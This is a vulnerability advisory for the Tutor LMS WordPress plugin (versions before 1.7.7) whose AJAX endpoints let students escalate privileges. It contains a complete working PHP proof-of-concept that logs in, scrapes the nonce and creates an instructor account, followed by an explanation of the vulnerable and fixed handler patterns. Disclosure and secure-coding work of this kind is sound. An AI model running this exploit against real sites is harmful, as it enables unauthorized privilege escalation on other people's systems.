WordPress Plugin Vulnerabilities

Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Description

Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

Proof of Concept

Only one PoC is provided, for the privilege escalation.

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => 'Instructor@Instructor.com',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
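The PoC works because a logged-in student can fetch the nonce from the dashboard and the handler never checks who is calling. As an added illustration (not Tutor LMS code), here is that unprotected AJAX handler pattern beside its hardened form; the action name is the one from the PoC, while the handler names, nonce action, role slug and capability are assumptions:

```php
<?php
// Added example, not the plugin's code: the bug class behind this advisory.
// A handler hooked to wp_ajax_<action> is reachable by ANY logged-in user
// (a student included), so it needs a nonce (CSRF) AND a capability check
// (authorization). A nonce alone proves nothing about privilege: every
// logged-in user can read it from the page source, as the PoC above does.

// Vulnerable pattern (hypothetical handler name): nonce only.
function vuln_add_instructor_handler() {
    check_ajax_referer( 'tutor_nonce_action', '_wpnonce' ); // hypothetical nonce action
    $user_id = wp_create_user(
        sanitize_user( $_POST['user_login'] ),
        $_POST['password'],
        sanitize_email( $_POST['email'] )
    );
    if ( ! is_wp_error( $user_id ) ) {
        ( new WP_User( $user_id ) )->set_role( 'tutor_instructor' ); // hypothetical role slug
    }
    wp_send_json_success();
}

// Hardened pattern: nonce AND capability, then input validation.
function fixed_add_instructor_handler() {
    check_ajax_referer( 'tutor_nonce_action', '_wpnonce' );
    // Only administrators may create instructor accounts (assumed policy).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
    $login = isset( $_POST['user_login'] ) ? sanitize_user( wp_unslash( $_POST['user_login'] ) ) : '';
    $email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    $pass  = isset( $_POST['password'] ) ? (string) wp_unslash( $_POST['password'] ) : '';
    if ( '' === $login || ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( array( 'message' => 'Invalid input' ), 400 );
    }
    $user_id = wp_create_user( $login, $pass, $email );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
    }
    ( new WP_User( $user_id ) )->set_role( 'tutor_instructor' );
    wp_send_json_success( array( 'user_id' => $user_id ) );
}

// Register only the logged-in hook; never wp_ajax_nopriv_ for a privileged action.
add_action( 'wp_ajax_tutor_add_instructor', 'fixed_add_instructor_handler' );
```

When auditing a plugin, grep every `wp_ajax_` and `wp_ajax_nopriv_` registration and confirm each handler calls `current_user_can()` (or an equivalent role check) before any state change.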

Affects Plugins

Fixed in 1.7.7

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Verified
Yes

Timeline

Publicly Published
2021-03-15
Added
2021-03-15
Last Updated
2021-03-20